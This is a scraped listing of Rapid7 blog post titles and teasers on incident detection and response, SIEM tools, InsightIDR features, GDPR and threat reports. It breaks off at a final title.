You’ve hired the best of the best and put up the right defenses, but one thing keeps slipping in the door: phishing emails. Part of doing business today, unfortunately, is dealing with phishing attacks. Few organizations are immune to phishing anymore; it’s on every security team’s mind and has become the number one threat to organizations

2 min InsightIDR

How to detect SMBv1 scanning and SMBv1 established connections

Learn how to use network traffic analysis (NTA) to detect SMBv1 scanning and SMBv1 established connections.

6 min Incident Detection

Managed Threat Detection and Response: The Questions You Need to Ask Vendors

In this post, Wade Woolwine, managed services director of technology at Rapid7, details our approach to managed detection and response: visibility, analytics, and arming our analysts with smart, customizable automation. Defending the modern enterprise is hard work. Between the need for round-the-clock coverage, technology to provide full visibility across the expanding enterprise, a highly skilled and experienced team, and the business level pressure to “prevent a breach,” there is little wonde

1 min Honeypots

Whiteboard Wednesday: Your 6-Minute Recap of Q1 2018’s Threat Landscape

Gotten a chance to read Rapid7’s Quarterly Threat Report for 2018 Q1? If not (or if you’re more of an auditory learner), we’ve put together a 6-minute recap video of the major findings. In our Quarterly Threat Reports, our security researchers provide a wide-angle view of the threat landscape by leveraging intelligence from the Rapid7 Insight platform

2 min InsightIDR

Rapid7 Quarterly Threat Report: 2018 Q1

Spring is here, and along with the flowers and the birds, the pollen and the never-ending allergies, we bring you 2018’s first Quarterly Threat Report! For the year’s inaugural report, we pulled an additional data set: significant events. While we like to look at trends in alerts over time, there is almost never a one-alert-per-incident correlation. Adversary actions involve multiple steps, which generate multiple alerts, and aft

5 min Endpoints

Unifying Security Data: How to Streamline Endpoint Detection and Response

Collecting data from the endpoint can be tedious and complex (to say the least). Between the data streaming from your Windows, Linux, and Mac endpoints, not to mention remote authentication and the processes running on these assets, there is a lot of information to gather and analyze. Unless you have a deep knowledge of operating systems to build this yourself—or additional budget to add these data streams to your SIEM tool—it may not be feasibl

4 min InsightIDR

What Makes SIEM Security Alerts Actionable? Automatic Context

Whether you call them alerts, alarms, offenses, or incidents, they’re all worthless without supporting context. A failed login attempt may be completely benign ... unless it happened from an anomalous asset or from a suspicious location. Escalation of a user’s privileges could be due to a special project or job promotion … or because that user’s account was compromised. Many security monitoring tools today generate false posit

3 min InsightIDR

How to Detect Devices on Your Network Running Telnet Services

Because Telnet is an unencrypted protocol, it is important that you monitor your network for any devices running Telnet services. Learn more.

4 min InsightIDR

Attacker Behavior Analytics: How InsightIDR Detects Unknown Threats

InsightIDR customers now have an ever-evolving library of attacker behavior detections automatically matched against their data. Read on to learn how Rapid7 SOC and threat intel teams investigate a constant rumbling of attacker behavior and transform it into actionable threat intelligence.

4 min InsightIDR

How to detect weak SSL/TLS encryption on your network

In this blog, we break down how to detect SSL/TLS encryption on your network.

2 min InsightIDR

How to detect new server ports in use on your network

In this blog, we discuss how to detect new server ports in use on your network.

4 min GDPR

GDPR Preparation March and April: Course Correct

Wow, how did March just happen? Living in a country that just fell apart like a clown car because of snow, it’s still feeling decidedly wintery here in the UK, and as a weather obsessed Brit I am fully looking forward to sunnier times. You know, that single day sometime in August. By that time, we’ll have crossed the border into the brave new world of the General Data Protection Regulation (GDPR), and like many of you, I am curious as to what t

3 min Incident Response

How to Build an Incident Response Plan: Your Battle Plan

An incident response plan can serve as your master blueprint for navigating the challenges of a security incident, ensuring everything is thought out in advance, secured appropriately, and that everyone on the team knows what to do if an issue does arise. In short, a well-crafted incident response plan will help your organization perform at its best by preparing for the worst. [eBook] Prepare for Battle: Building an Incident Response

3 min Incident Response

Today's Threat Landscape Demands User Behavior Analytics

Attackers continue to hide in plain sight by impersonating company users, forcing security teams to overcome two challenges...

3 min GDPR

Tonight I'm gonna IR like it's 99 (days until GDPR)…

Sorry Nena, it was going to be you or Prince that was going to get the headline, and whilst 99 Red Balloons is a catchy 80’s classic, I had to give credit to His Royal Purpleness. It was that or pay tribute to a childhood favourite vanilla ‘whippy’ ice cream, adorned with a Cadbury’s Flake, but I’m not so sure that would resonate so well with a global audience. “Why 99?”, you may ask. Why not a nice roun

4 min InsightIDR

Finding Evil: Why Managed Detection and Response Zeroes In On the Endpoint

This post was co-written with Wade Woolwine [/author/wade-woolwine], Rapid7 Director of Managed Services. What three categories do attackers exploit to get on your corporate network? Vulnerabilities, misconfigurations, and credentials. Whether the attack starts by stealing cloud service credentials, or exploiting a vulnerability on a misconfigured, internet-facing asset, compromising an internal asset is a great milestone for an intruder. Once an endpoint is compromised, the attacker can: *

3 min InsightIDR

How To Detect Unauthorized DNS Servers On Your Network

DNS was never designed as a very secure protocol, and it is a popular target for attackers. Here is how you can detect unauthorized DNS servers on your network.

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 4)

This is not a drill. In this final installment, read our recommendations for handling a real incident. Whether opportunistic or targeted, here's what you should be thinking about.

3 min GDPR

MDR and GDPR: More than a lot of letters

With 2018 now well in our sights, the countdown to the General Data Protection Regulation (GDPR) is most definitely on. Articles 33 and 34 of the GDPR require organizations to communicate personal data breaches when there is a high risk of impact to the people to whom the data pertains

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 3)

Now, it’s time for the fun stuff. While an incident response plan review may feel like practicing moves on a wooden dummy, stress testing should feel more like Donnie Yen fighting ten people for bags of rice in Ip Man

2 min SIEM

Rapid7 Excels at Advanced Analytics and User Monitoring in Gartner's 2017 SIEM Critical Capabilities Report

If you’re looking for a SIEM solution, chances are you’ve at least heard of the Gartner Magic Quadrant for Security Information and Event Management (SIEM). But what about its companion guide, the Critical Capabilities report? Still yes, probably. If you want to understand the various features and integrations your peers need in a SIEM tool

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 2)

In Part 1, we covered key considerations when drafting an incident response plan. Here, we'll cover the best way to get buy-in from key company stakeholders...

2 min InsightIDR

2017 Gartner Magic Quadrant for SIEM: Rapid7 Named a Visionary

If you’re currently tackling an active SIEM project, it’s not easy to dig through libraries of product briefs and outlandish marketing claims. You can turn to trusted peers, but that’s challenging in a world where most leaders aren’t satisfied with their SIEM, even after generous amounts of professional services and third-party management. Luckily, Gartner is no stranger to putting vendors to the test, especially for SIEM, where since 2005 they’ve release

4 min Incident Response

Prepare for Battle: Let’s Build an Incident Response Plan (Part 1)

Creating and testing an IR plan mitigates risk—help your organization perform at its best by preparing it for the worst. Join us for Part 1: drafting the plan.

3 min InsightIDR

An Agent to Rule Them All: InsightIDR Monitors Win, Linux & Mac Endpoints

Today’s SIEM tools aren’t just for compliance and post-breach investigations. Advanced analytics, such as user behavior analytics, are now core to SIEM [/2017/10/16/siem-market-evolution-and-the-future-of-siem-tools/] to help teams find the needles in their ever-growing data stacks. That means in order for project success, the right data sources need to be connected: “If a log falls in a forest a

2 min Incident Detection

Firewall Reporting Excessive SYN Packets? Check Rate of Connections

In this blog, we break down what you should do if your firewall is reporting excessive SYN packets.

2 min InsightIDR

Faster Investigations, Closer Teamwork: InsightIDR Enhancements

Incident investigations aren’t easy. Imagine investigation as a 100-piece jigsaw puzzle, except there are a million unarranged pieces to build from. Top analysts need to know what “bad” looks like and how to find it, and they must bring a sharp Excel game to stitch everything together...

4 min Incident Detection

Changing the Corporate Network Attacker’s Risk-Reward Paradigm

Defending a corporate network is hard, while attacking one is all too easy. We break down the risk/reward ratio for corporate attackers and what we can do to change it.

5 min SIEM

SIEM Market Evolution And The Future of SIEM Tools

There’s a lot to be learned by watching a market like SIEM adapt as technology evolves, both for the attackers and the analysis.

3 min InsightIDR

InsightIDR Now Supports Multi-Factor Auth and Data Archiving

InsightIDR is now part of the Rapid7 platform. Learn more about our platform vision and how it enables you to have the SIEM solution you've always wanted.

2 min InsightIDR

How to Detect BitTorrent Traffic on your Network

Learn how to detect BitTorrent traffic on your network to capture metadata such as INFO-HASH, IP addresses, and usernames.

2 min Incident Detection

Rapid7 and NISC work together to help customers with detection and response

Rapid7 and NISC will work together to provide Managed Detection and Response (MDR) services to the NISC member base, powered by the Rapid7 Insight platform and Rapid7 Security Operation Centers (SOCs).

2 min InsightIDR

Want to try InsightIDR in Your Environment? Free Trial Now Available

InsightIDR, our SIEM powered by user behavior analytics, is now available to try in your environment. This post shares how it can help your security team.

4 min InsightIDR

PCI DSS Dashboards in InsightIDR: New Pre-Built Cards

No matter how much you mature your security program and reduce the risk of a breach, your life includes the need to report across the company, and periodically, to auditors. We want to make that part as easy as possible. We built InsightIDR as a SaaS SIEM on top of our proven User Behavior Analytics (UBA)

3 min Breach Preparedness

The Legal Perspective of a Data Breach

The following is a guest post by Christopher Hart, an attorney at Foley Hoag and a member of Foley Hoag’s cybersecurity incident response team. This is not meant to constitute legal advice; instead, Chris offers helpful guidance for building an incident preparation and breach response framework in your own organization. A data breach is a business crisis that requires both a quick and a careful response. From my perspective as a lawyer, I want to provide the best advice and assistance I possibl

2 min InsightIDR

More Answers, Less Query Language: Bringing Visual Search to InsightIDR

Sitting down with your data lake and asking it questions has never been easy. In the infosec world, there are additional layers of complexity. Users are bouncing between assets, services, and geographical locations, with each monitoring silo producing its own log files and slivers of the complete picture. From a human perspective, distilling this data requires two unique skillsets: * Incident Response: Is this anomalous activity a fa

3 min Incident Response

Running an Effective Incident Response Tabletop Exercise

Are you ready for an incident? Are you confident that your team knows the procedures, and that the procedures are actually useful? An incident response tabletop exercise is an excellent way to answer these questions. Below, I've outlined some steps to help ensure success for your scenario-based threat simulations. First, identify your audience. This will help inform which type of exercise you'll want to run. Will it be an executive exerci

3 min Authentication

Under the Hoodie: Actionable Research from Penetration Testing Engagements

Today, we're excited to release Rapid7's latest research paper, Under the Hoodie: Actionable Research from Penetration Testing Engagements, by Bob Rudis, Andrew Whitaker, Tod Beardsley, with loads of input and help from the entire Rapid7 pentesting team. This paper covers the often occult art of penetration testing, and seeks to demystify the proce

8 min SIEM

Incident Detection and Investigation - How Math Helps But Is Not Enough

I love math. I am even going to own up to having been a "mathlete" and looking forward to the annual UVM Math Contest in high school. I pursued a degree in engineering, so I can now more accurately say that I love applied mathematics, which have a much different goal than pure mathematics. Taking advanced developments in pure mathematics and applying them to various industries in a meaningful manner often takes years or decades. In th

4 min User Experience

12 Days of HaXmas: Designing Information Security Applications Your Way

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas [/tag/haxmas/] with 12 days of blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Are you a busy Information Security professional that prefers bloated web applications, fancy interactions, unnecessary visuals, and overloaded screens that are difficult to

5 min SIEM

12 Days of HaXmas: Rudolph the Machine Learning Reindeer

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas [/tag/haxmas/] with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Sam the snowman taught me everything I know about reindeer [disclaimer: not actually true], so it only seemed logical that we bring him back to explain the journey of machine learni

4 min User Behavior Analytics

SIEM Tools Aren't Dead, They're Just Shedding Some Extra Pounds

Security Information and Event Management (SIEM) is security's Schrödinger's cat. While half of today's organizations have purchased SIEM tools, it's unknown if the tech is useful to the security team… or if its heart is even beating or deployed. In response to this pain, people, mostly marketers, love to shout that SIEM is dead, and analysts are proposing new frameworks with SIEM 2.0/3.0, Security Analytics

4 min Incident Detection

Web Shells 101: Detection and Prevention

2016 has been a big year for information security, as we've seen attacks by both cybercriminals and state actors increase in size and public awareness, and the Internet of Things comes into its own as a field of study. But today we'd like to talk about a very old (but no less dangerous) type of attacker tool – web shells – and new techniques Rapid7 is developing for identifying them quickly and accurately. What is a Web Shell? Web shells are web-based applications that provide a threat actor wi

3 min InsightIDR

How to Troubleshoot Slow Network Issues With Network Traffic Analysis

In this blog, we discuss how to troubleshoot slow network issues with Network Traffic Analysis.

4 min Incident Detection

Introspective Intelligence: What Makes Your Network Tick, What Makes It Sick?

In my last blog post [/2016/11/16/introspective-intelligence-understanding-detections], we reviewed the most prevalent detection strategies and how we can best implement them. This post dives into understanding how to catch what our other systems missed, using attacker behavior analytics and anomaly detection to improve detection. Understand Your Adversary – Attack Methodology Detection Contextual intelligence feeds introduce higher fidelity and the details needed to gain insight into patterns

4 min SIEM

Cyber Threat Intelligence: How Do You Incorporate it in Your InfoSec Strategy?

In the age of user behavior analytics, next-gen attacks, polymorphic malware, and reticulating anomalies, is there a time and place for threat intelligence? Of course there is! But – and it seems there is always a ‘but' with threat intelligence – it needs to be carefully applied and managed so that it truly adds value and not just noise. In short, it needs to actually be intelligence, not just data, in order to be valuable to

3 min Incident Detection

Introspective Intelligence: Understanding Detection Techniques

To provide insight into the methods devised by Rapid7, we'll need to revisit the detection methods implemented across InfoSec products and services and how we apply data differently. Rapid7 gathers volumes of threat intelligence on a daily basis - from new penetration testing tools, tactics, and procedures in Metasploit, vulnerability detections in Nexpose

4 min Detection and Response

5 Tips If You Are Looking to Analyze & Monitor Network Traffic

There are many good reasons to monitor network traffic. Here are 5 areas you should consider when getting started. Learn more.

6 min Incident Detection

User Behavior Analytics and Privacy: It's All About Respect

When I speak with prospects and customers about incident detection and response (IDR), I'm almost always discussing the technical pros and cons. Companies look to Rapid7 to combine user behavior analytics (UBA) with endpoint detection and log search to spot malicious behavior in their environment. It's an effective approach: an analytics engine that triggers based on known attack m

4 min SIEM

Displace SIEM "Rules" Built for Machines with Custom Alerts Built For Humans

If you've ever been irritated with endpoint detection being a black box and SIEM detection putting the entire onus on you, don't think you had unreasonable expectations; we have all wondered why solutions were only built at such extremes. As software has evolved and our base expectations with it, a lot more people have started to wonder why it requires so many hours of training just to make solutions do what they are designed to do. Defining a

3 min Vulnerability Management

Warning: This blog post contains multiple hoorays! #sorrynotsorry

Hooray for crystalware! I hit a marketer's milestone on Thursday – my first official award ceremony, courtesy of the folks at Computing Security Awards, which was held at The Cumberland Hotel in London. Staying out late on a school night when there's a 16 month old teething toddler in the house definitely took its toll the following morning, but the tiredness was definitely softened by the sweet knowledge that we'd left the award ceremony brandishing som

4 min SIEM

Demanding More from Your SIEM Tools [Webcast Summary]

Do you suffer from too many vague and un-prioritized incident alerts? What about ballooning SIEM data and deployment costs as your organization expands and ingests more data? You're not alone. Last week, over a hundred infosec folks joined us live for Demanding More out of Your SIEM. Content Shared in the Webcast In Gartner's Feb 2016, “Security Information and Even

2 min Incident Response

Looking for a Managed Detection & Response Provider? You'll Need These 38 Evaluation Questions

Managed Detection and Response (MDR) services are still a relatively new concept in the security industry. Just recently, Gartner published their first Market Guide on Managed Detection & Response, which further defines the MDR Services market. MDR Services combines human expertise with tools to provide 24/7 monitoring and

2 min Nexpose

UNITED 2016: Want to share your experience?

Key trends. Expert advice. The latest techniques and technology. UNITED 2016 is created from the ground up to provide the insight you need to drive your security program forward, faster. This year, we're also hoping you can provide us with the insight we need to make our products and services even better. That's why we're running two UX focus groups on November 1, 2016. We'd love to see you there—after all, your feedback is what keeps our solutions ever-evolvi

4 min Malware

Malware and Advanced Threat Protection: A User-Host-Process Model

[Editor's Note: This is a sneak peek at what Tim will be presenting at UNITED 2016 in November. Learn more and secure your pass!] In today's big data and data science age, you need to think outside the box when it comes to malware and advanced threat protection. For the Analytic Response team at our 24/7 SOC in Alexandria, VA, we use three levels of user behavior analytics

4 min Nexpose

InsightIDR & Nexpose Integrate for Total User & Asset Security Visibility

Rapid7's Incident Detection and Response and Vulnerability Management solutions, InsightIDR and Nexpose, now integrate to provide visibility and security detection across assets and the users behind them. Combining the pair provides massive time savings and simplifies incident investigation

3 min InsightIDR

3 Ways for Generating Reports on WAN Bandwidth Utilization

3 popular ways of getting visibility into WAN bandwidth monitoring, one of the most popular use cases for network traffic analysis.

5 min SIEM

SIEM Solutions Don't Detect Attacks, Custom Code And Advanced Analysts Do

This post is the fifth in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first four, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], and here [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck]. While a lot of people may think it's a co

4 min Incident Response

The Calm Heroes Fighting Cyber-Crime

The call everyone had been waiting for came in: the shuffleboard table arrived, and was ready to be brought upstairs and constructed! The team had been hard at work all morning in the open-style office space with conference rooms and private offices along the perimeter. The Security Operations Center (SOC) with computers, many monitors and an open layout was behind a PIN activated door. The team wanted something fun in the office to do when they took a break from defending networks. My office-m

2 min Incident Response

10 Years Later: What Have We Learned About Incident Response?

When we take a look at the last ten years, what's changed in attacker methodology, and how has it changed our response? Some old-school methods continue to find success - attackers continue to opportunistically exploit old vulnerabilities and use weak/stolen credentials to move around the network. However, the work of the good guys, reliably detecting and responding to threats, has shifted to accommodate an attack surface that now includes mobile devices, cloud services, and a global workforce t

3 min User Behavior Analytics

[Q&A] User Behavior Analytics as Easy as ABC Webcast

Earlier this week, we had a great webcast all about User Behavior Analytics (UBA). If you'd like to learn why organizations are benefiting from UBA, including how it works, top use cases, and pitfalls to avoid, along with a demo of Rapid7 InsightIDR, check out on-demand: User Behavior Analytics: As Easy as ABC or the UBA Buyer's Tool Kit

0 min Incident Response

From the trenches: Breaches, Stories, Simple Security Solutions - from MacAdmins at PSU

Over the last few months, Jordan Rogers [/author/jordan-rogers] and I have been speaking about the benefits of doing the basics right in information security. Reducing noise, avoiding the waste of precious budget dollars on solutions that will not be used to their fullest, as well as improving the overall security of your enterprise are all goals that can be achieved with some of these simple tips. We presented a hybrid Mac/Windows version of this talk at the MacAdmins conference at PSU

3 min SIEM

Hide and Seek: Three Unseen Costs in Your SIEM Products

As the saying goes, ‘there is no such thing as a free lunch.' In life, including the technology sector, many things are more expensive than they appear. A free game app encourages in-app purchases to enhance the playing experience, while a new phone requires a monthly plan for data, calling, and texting capabilities. In the security industry, one technology that stands out for its hidden costs is Security Information and Event Management (SIEM) tools.

0 min Security Nation

[Security Nation] Moving Beyond SIEM — Or Not?

The amount of alerts streaming out of security tools can easily lead infosec professionals down the wrong path. But what’s the solution?

0 min Security Nation

[Security Nation] Building, Accelerating, and Measuring an Incident Response Program

In this episode of Security Nation, Wade Woolwine and Kyle Flaherty discuss how organizations can manage incident detection and response initiatives.

3 min SIEM

Detecting Stolen Credentials Requires Endpoint Monitoring

If you are serious about detecting advanced attackers using compromised credentials on your network, there is one fact that you must come to terms with: you need to somehow collect data from your endpoints. There is no way around this fact. It is not only because the most likely way that these attackers will initially access your network is via an endpoint. Yes, that is true, but there are also behaviors, both simple and stealthy, th

3 min Incident Response

Applying Poker Theory to Incident Detection & Response

Editor's Note: Calling Your Bluff: Behavior Analytics in Poker and Incident Detection [/2016/03/31/calling-your-bluff-behavior-analytics-in-poker-and-incident-detection] was really fun and well received, so here's an encore! Hold'em & Network Security: Two Games of Incomplete Information When chatting about my past poker experience, there's one statement that pops up time and time again: “So… as a 'pro'… you probably bluff a lot.” A bluff is a bet made knowing that if called, you have no c

5 min InsightIDR

5 Methods For Detecting Ransomware Activity

Recently, ransomware was primarily a consumer problem. However, cybercriminals behind recent ransomware attacks have now shifted their focus to businesses.

4 min Incident Response

Attackers Prey on Incident Response Bottlenecks

Organizations are taking too long to detect attacks. The average length of time to detect an intruder ranges from 2 months to 229 days across many reports and anecdotal evidence from publicized breaches supports these numbers. This means that attackers are taking advantage of the challenges inherent to the flood of information bombarding your incident response team every day. This is a problem that we need to address by improving the process with better tools. The incident handling process is s

5 min SIEM

Why Flexible Analytics Solutions Can Help Your Incident Response Team

I happen to despise buzzwords, so it has been challenging for me to use the term "big data security analytics" in a sentence, mostly because I find it to be a technical description of the solutions in this space, rather than an indicator of the value they provide. However, since we build products based on the security problems we identify, I want to explain how those technologies can be used to target some highly pervasive incident response challenges. Detection and investigation problems conti

5 min Incident Response

What Makes SIEMs So Challenging?

I've been at the technical helm for dozens of demonstrations and evaluations of our incident detection and investigation solution, InsightIDR, and I've been running into the same conversation time and time again: SIEMs aren't working for incident detection and response. At least, they aren't working without investing a lot of time, effort, and resources to configure, tune, and maintain a SIEM deployment. Most organizations don't have the recommende

3 min Cloud Infrastructure

Incident Detection Needs to Account for Disruptive Technologies

Since InsightIDR was first designed, there has been a noteworthy consistency: it collects data from your legacy networking infrastructure, the mobile devices accessing your resources, and your cloud infrastructure. This is because we believe that you need to monitor users wherever they have access to the network to accurately detect misuse and abuse of company resources, be they malicious or negligent in origin. This doesn't mean tiptoeing around emp

4 min Honeypots

Leverage Attackers' Need To Explore For Detection

When you examine the sanitized forensic analyses, threat briefings, and aggregated annual reports, there are two basic facts that emerge: 1. There are a lot of different attacker groups with access to the same Internet as baby boomers and short-term contractors. 2. Most of them are proficient at user impersonation once on the network to remain undetected for months. In this reality, our organizations need to do more than just build defenses and sit in waiting until known signature

3 min SIEM

Attackers Thrive on Chaos; Don't Be Blind to It

Many find it strange, but I really enjoy chaos. It is calming to see so many problems around in need of solutions. For completely different reasons, attackers love the chaos within our organizations. It leaves a lot of openings for gaining access and remaining undetected within the noise. Rapid7 has always focused on reducing the weaknesses introduced by chaos. Dr. Ian Malcolm taught us in Jurassic Park that you cannot control chaos. Instead, we strive to help you reduce and understand its impa

4 min SIEM

Enterprise Account Takeover: The Moment Intruders Become Insiders

Every time an attacker successfully breaches an organization, there is a flurry of articles and tweets attempting to explain exactly what happened so information security teams worldwide are able to either a) sleep at night because they have mitigated the vector or b) lose only one night of sleep mitigating it. Here's the problem: every breach is complex and involves a great deal more malicious actions than are published on your chosen 24-hour news website. The least detected action is the use o

5 min Cloud Infrastructure

Positive Secondary Effects: Incident Response Teams Benefit From Cloud Applications

We primarily hear the term "secondary effects" after natural disasters: "an earthquake causes a gas line to rupture and a fire ensues" or "a volcano erupts and the sulfur cloud shuts down all flights across the Atlantic", but there are a lot of positive secondary effects out there. If developed properly, cloud applications bring with them secondary effects of singular events to benefit the customer community. Since I work for a security company, I cannot write a blog post about cloud applicatio

4 min SIEM

When Your SIEM Tools Are Just Not Enough

Security Information and Event Management (SIEM) tools have come a long way since their inception in 1997. The initial vision for SIEM tools was to be a ‘security single pane of glass,' eliminating alert fatigue, both in quantity and quality of alerts. Yet the question still remains: have SIEMs delivered on that promise, and if so, can every security team benefit from one? In this blog we'll dive a bit into the history be

3 min SIEM

Alert Fatigue: Incident Response Teams Stop Listening to Monitoring Solutions

"Don't Be Noisy." It's that simple. This motto may be the only remaining principle of the concept that entered incubation in mid-2012 and eventually became InsightIDR. Of the pains that our customers shared with us up to that point, there was a very consistent challenge: monitoring products were too noisy. Whether they were talking about a firewall, a web proxy, SIEM, or a solution that doesn't fit into a simple category, these design partners told

2 min InsightIDR

The Insight Platform Goes to Europe: Now Compliant with European Data Hosting Requirement

Cloud technology is everywhere. From our annual survey, we found that 79% of organizations are allowing approved cloud services, with Office 365, Google Apps, and Salesforce coming in as the top 3. InsightIDR, our full incident detection and response solution, and InsightUBA, our user behavior analytics solution, are both cloud-based by design, and host in the

1 min Incident Detection

Redner's Markets Selects Nexpose & InsightUBA for Compliance and Incident Detection

With breaches making regular headlines, security teams are under more scrutiny than ever before. This is especially true in retail, where strong security practices are paramount to protecting customer and organizational data. PCI DSS compliance is a key component of any retail organization's security program. As a level 2 merchant, Redner's Markets must conduct regular vulnerability scans, collect logs, and review them daily. “Compliance was what began our rel

4 min Incident Detection

Attackers Love When You Stop Watching Your Endpoints, Even For A Minute

One of the plagues of the incident detection space is the bias of functional fixedness. The accepted thought is that your monitoring is only effective for systems that are within the perimeter and communicating directly with the domain controller. And, the logic continues, when they are away from this trusted realm, your assets are protected only by the preventive software running on them. Given the continuous rise of remote workers (telecommuting rose 79 percent from 2005 to 2012), it's now tim

2 min Incident Detection

UNITED 2016: Power Up Your Incident Detection and Response

When you think about fall in New England, the visions that should flow through your head are gorgeous foliage, cool autumn nights... and the evolution of incident detection and response technology. That's right, it's time we start talking about UNITED 2016, Rapid7's annual user conference held in Boston (this year it's November 1-3). This UNITED, we have a major initiative to help you cut through the industry noise, acronyms, and buzzwords around IDR. That is why this

4 min Incident Detection

IDC: 70% of Successful Breaches Originate on the Endpoint

This is part 2 of a blog post series on a new IDC infographic covering new data on compromised credentials and incident detection. Check out part 1 now [/2014/11/10/more-efficient-incident-detection-and-investigation-saves-400000-per-year-says-idc] if you missed it. Most organizations focus on their server infrastructure when thinking about security – a fact we often see in our Ne

2 min Incident Response

SANS Review of Rapid7 UserInsight (now InsightUBA) for User Behavior Analytics and Incident Response

Editor's Note - March 2016: Since this review, UserInsight has now become InsightUBA. Along with the name change comes a completely redesigned user interface, continuous endpoint detection, and another intruder trap to reliably detect attacker behavior outside of logs. We also launched InsightIDR, which combines the full power of InsightUBA with Endpoint Forensics, Machine Data Search, and Compliance Reporting into a single solution. Learn more about InsightIDR here. [

2 min InsightIDR

Calling Your Bluff: Behavior Analytics in Poker and Incident Detection

As a former – or dormant – professional poker player, I'm seeing a lot of parallels between poker and incident detection, especially when it comes to behavior analytics. Detecting a bluff in poker is really not all that different from detecting an intruder on the network. New solutions, like Rapid7's InsightIDR, incorporate machine learning and user behavior analytics to detect stealthy attacks. This is

5 min Incident Detection

What is Incident Detection and Response?

Incident detection and response, also known as attack/threat detection and response, is the process of finding intruders in your infrastructure, retracing their activity, containing the threat, and removing their foothold. By learning how attackers compromise systems and move around your network, you can be better equipped to detect and stop attacks before valuable data is stolen. This blog covers the different components of the attack lifecycle to h

2 min InsightIDR

Moving Beyond UserInsight: What's New in InsightUBA?

As Kyle mentioned at launch, there's a lot more to InsightUBA than a name change. Over the past nine months, we've continued to work with our Penetration Test and Analytic Response teams, and sought direct input from you all to not only better our detection and investigation, but also improve your user experience. Improve how? It's all centered on saving you time: less time scoping and validating alerts, less jumping between screens, and a single optimized workflow for even faster investigations

5 min Events

RSA 2016: Filtering Through The Noise

The memory is a fickle beast. Perhaps this past RSA Conference was my 14th, or my 8th, or 7th…hmmm, they often run together. In truth this Conference has become such an ingrained part of my life that my wife often jokes about becoming an “RSA Widow” the week of the conference, and then dealing with my “RSAFLU” the next week. Well this year was different team, this year SHE got sick upon my return, along with two of the kids. Oh karma, that was just deserved. And while the fridge is now full of Ta

3 min Breach Response News

Changing Threat Landscape Evolves IDR

This is part 2 of a 2-part blog series on how Incident Response is changing. Here's part one [/2016/03/03/incident-response-the-times-they-are-a-changin]. The changing threat landscape forced an evolution in incident detection & response (IDR) that encompasses changes in tools, process, and people. While in 2005 we could get away with basic detection and a “pave and re-image” approach, 2016 sees us needing complex detection methodologies enabled by powerful software and hardware to enable expe

1 min Incident Detection

Incident Response: The Times They Are A Changin'

While everyone in the security world is seemingly at RSA Conference, my mind has been searching through the past. It actually started a few weeks ago, when Gartner's Anton Chuvakin asked for examples of how today's Incident Detection & Response (IDR) is different from 2005. My short comment to his post started to explore the topic of change over the past decade of IR, but I kept thinki

2 min Incident Detection

There's More To A Name: Introducing InsightUBA

…intuition, perception, awareness, understanding, comprehension, wisdom… Each morning driving my two older boys to school we play the ‘synonym game’, and I pit them against one another in a three-round battle to see how many alternatives they can come up with to the words I've selected that morning. The games get brutal; this is of no surprise to those who have seen my 1,000 page ‘Synonym Finder’ book prominently displayed in

8 min Threat Intel

How to Build Threat Intelligence into your IDR Strategy: Webinar FAQ

Thanks to everyone who joined our webinar on How to Build Threat Intelligence into your Incident Detection and Response Program. We got so many great questions during the session that we decided to follow up with a post answering them and addressing the trends and themes we continue to see around threat intelligence. TL/DR for those of you who don't have time to read all of

1 min Incident Detection

Get the 2015 Incident Detection & Response Survey Results!

In order to learn more about the strategic initiatives, current tools used, and challenges security teams are facing today, we surveyed 271 security professionals hailing from organizations across the globe. We were able to get fantastic responses representing companies from all sizes and industries, including healthcare, finance, retail, and government. On January 21st, we will be hosting a webcast with full analysis of the results. Register now and get the full report today. [http://www.ra

5 min Log Management

If You Work In Operations, Your Security Team Needs The Logs, Too

This post is the final in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the previous six, click one [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], two [/2015/10/29/whether-or-not-siem-died-the-problems-remain], three [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], four [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck], five [/2015/11/19/siems-dont-detect-attacks-a

5 min SIEM

5 Ways Attackers Can Evade a SIEM

I've been in love with the idea of a SIEM since I was a system administrator. My first Real Job™ was helping run a Linux-based network for a public university. We were open source nuts, and this network was our playground. Things did not always work as intended. Servers crashed, performance was occasionally iffy on the fileserver and the network, and we were often responding to outages. Of course, we had tools to alert us when outages were going on. I learned to browse the logs and the system m

4 min Incident Response

Even With 80% Automation For Detection, You Need to Ease the 20% Human Diligence

This post is the penultimate in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first five, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter], here [/2015/11/11/making-sure-search-is-not-your-incident-response-bottleneck], and here [/2015/11/19/siems-dont-detect-a

4 min Incident Detection

When Hunting is the Right Choice for Your Security Team - and when it's not

The concept of hunting for threats is being hyped by media and vendors – creating a marketing smokescreen of confusion around what hunting is, how it works, and what value looks like when hunting is done effectively. Your security team's ability to hunt is primarily affected by the maturity of your security program, your threat profile, and your resources. Hunting is searching for malice on your network. The security lifecycle can be described in a number of ways; I think a good way of describi

1 min Incident Detection

Take the Rapid7 2015 Incident Detection & Response Survey!

Take the 10 Minute Survey here. Incident Detection and Response is a growing challenge - security teams are often understaffed, the attack surface for intruders is expanding, and it's difficult to detect stealthy user-based attacks. We want to learn more about your organization's security team, including the challenges you're facing today and plans for the future. Your feedback helps shape the products Rapid7 offers to make your job easier. By t

5 min Incident Response

Making Sure Search Is Not Your Incident Response Bottleneck

